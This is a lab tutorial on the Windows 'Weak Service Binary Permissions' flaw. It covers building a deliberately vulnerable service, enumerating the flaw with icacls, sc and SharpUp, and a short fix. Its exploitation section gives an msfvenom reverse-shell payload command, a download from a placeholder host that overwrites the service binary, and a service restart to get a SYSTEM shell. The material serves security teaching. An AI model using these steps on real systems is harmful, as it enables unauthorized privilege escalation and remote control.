Weak Service Binary Permissions indicate a vulnerability due to insufficient permissions on service executables. This vulnerability can be exploited by an adversary to modify the service executable, granting unauthorized access or potentially elevating system privileges.
- Open a PowerShell with local Administrtor Privileges and use the following command to create a new folder:
mkdir "C:\Program Files\CustomSrv2\"
-
Download the file Service2.exe to the 'C:\Program Files\CustomSrv2' directory.
-
Grant modify privileges to BUILTIN\Users for the service folder:
icacls "C:\Program Files\CustomSrv2\Service2.exe" /grant BUILTIN\Users:M
- Install the new Service:
New-Service -Name "Vulnerable Service 2" -BinaryPathName "C:\Program Files\CustomSrv2\Service2.exe" -DisplayName "Vuln Service 2" -Description "My Custom Vulnerable Service 2" -StartupType Automatic
- Edit new service's permissions to be controlled by BUILTIN\Users:
cmd.exe /c 'sc sdset "Vulnerable Service 2" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWP;;;BU)'
Outcome:
- Verify the new service (services.msc):
- Manually start the service from the service panel, or reboot the machine due to the service is set to start automatically upon machine boot.
ℹ️ If you want to unistall the new service use the following command:
Remove-Service -Name "Vulnerable Service 2"
To set up the lab with the 'Weak Service Binary Permissions' vulnerability is by using the custom PowerShell script named WeakServiceBinaryPermissions.ps1.
- Open a PowerShelll with local Administrator privileges and run the script:
.\WeakServiceBinaryPermissions.ps1
Outcome:
- Manually start the service from the service panel, or reboot the machine due to the service is set to start automatically upon machine boot.
ℹ️ If you want to unistall the new service use the following command:
Remove-Service -Name "Vulnerable Service 2"
To perform manual enumeration of the Weak Service Binary Permissions vulnerability, you can use the following steps:
- Open a command prompt and use the following command to enumerate the permissions of the service binary:
icacls "C:\Program Files\CustomSrv2\Service2.exe"
Outcome:
- Use the following command to find out the
START_TYPEandSERVICE_START_NAME:
sc qc "Vulnerable Service 2"
Outcome:
- Use the following command to find out the
STATEand it's attributes:
sc query "Vulnerable Service 2"
Outcome:
ℹ️ Finally, as you can see:
- The BUILTIN\Users can modify the Service2.exe.
- The service automatically starts after machine boots.
- The Local System runs the service.
- The service is running.
To run the SharpUp tool and perform an enumeration of the Weak Service Binary Permissions vulnerability, you can execute the following command with appropriate arguments:
SharpUp.exe audit ModifiableServiceBinaries
Outcome:
To abuse this vulnerability you should follow these steps:
- If the service is running and you have permissions to stop it:
sc stop "Vulnerable Service 2"
Outcome:
- Create with msfvenom a malicious exe file:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f exe > Service2.exe
-
Open a listener in your kali machine.
-
Transfer and overwrite the Service2.exe file with the malicious binary:
iwr -Uri http://<ip>:<port>/Service2.exe -Outfile C:\Program Files\CustomSrv2\Service2.exe
- Start the service with the following command or reboot the machine:
sc start "Vulnerable Service 2"
- Verify the reverse shell on your Kali machine:
To defend against Weak Service Binary Permissions vulnerabilities, adjust permissions on Service executables initiated through this mechanism. This limits unauthorized access and strengthens security measures:
icacls "C:\Program Files\CustomSrv2\Service2.exe" /remove:g BUILTIN\Users:(M)